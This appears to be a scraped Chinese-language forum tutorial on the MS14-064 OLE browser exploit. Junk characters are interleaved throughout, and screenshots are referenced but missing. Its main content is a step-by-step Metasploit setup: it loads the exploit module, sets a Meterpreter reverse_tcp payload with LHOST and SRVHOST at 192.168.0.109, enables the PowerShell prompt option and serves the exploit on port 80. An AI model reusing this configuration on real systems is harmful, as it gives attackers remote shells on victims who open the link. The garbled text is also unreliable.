+ c6 C7 S. y$ `$ m) J$ e 我发现msf下的exp只能针对带有powershell的机器进行攻击,我们用如下方法来搞演示
5 |- A: |/ X+ D% k4 u
4 a! V8 ^5 K: q3 c
9 m) R' T0 q/ ]" `7 c 开启msf执行命令use exploits/windows/browser/ms14_064_ole_code_execution如图: 4 X7 h3 s) g p, Z' d) M
{ P" v Y4 c0 a8 G$ Z; p" l0 k5 a1 n) X
然后执行命令 set PAYLOAD windows/meterpreter/reverse_tcp
2 C6 A2 I3 v7 m" h
3 Q: I- a! y! t; h
& E) F0 c) |+ k Z7 j
set AllowPowershellPrompt true
* E( s# l6 h+ Y. g3 p
: E1 v4 N( L. x+ f) E6 p
' H9 V: {" k( e- |% V Set LHOST 192.168.0.109% [! b# Z+ k$ H' c+ K
% q2 E9 R) L, ~" j$ r8 p% p8 T% u% p0 ]% t" u8 I
set SRVHOST 192.168.0.109
& A0 F( C3 M0 i* c/ X8 C" L
2 s) M2 k" T5 b( d& J+ S
3 q3 J4 }* s8 w1 o) U Set uripath share( T5 h' l2 z3 s |
4 x$ U9 ?- w t* w6 ^
& F" P; d1 l* w X" E% M& O
Set srvport 80
$ F0 S; Z" ]/ K- \& U
; G( i3 Y+ U" m4 ~
& Q: ]* u* d( V8 H
. B$ |' }$ g r2 I4 f" p( p
; a5 Y9 l6 L" U0 R# c# R5 S# G
- c" y$ J6 T/ }8 } Z
; ]2 g. `& Z$ q$ ^. ]4 c
9 h8 Z& H/ z/ h9 q1 {
6 n% Q, R! Z5 Q) H7 z4 d, n
/ l& H( Y l/ t8 \2 t
) I7 Q# M6 w! O- c* o
7 b! x* C! g, K$ x: t
1 H" d# D# _$ Y# p' D+ i- H: ~# f/ u
- a4 g5 ~6 a0 ?+ m4 r3 k3 Y) {6 Y# K4 l9 _4 m% A8 d# k! j
5 q4 W; G2 v3 T2 Y+ p
* ]& ^ X( p: [0 _1 ]- z
: \3 R z' l3 j! ?! ^, |7 O- u 下面我们来访问本地地址如图:
$ |! m% M3 b8 h; E) F- q( P
* o. I( S6 d* n! x" h3 ^# ?
|: ]6 n- R6 ?) \8 }2 H, w; |% }
$ F: Q: M: X8 I, Y; Z+ X6 w& o
, t& N# E( @) z F9 d- z3 O. F( G6 X% B2 N. L. M: V6 ]) d
: l6 a8 L' ?* S
/ P# R2 F& A3 [, z
- _) A. D5 V' ]3 @$ l9 z! W * Z; k$ \0 \- f, c% r7 r, R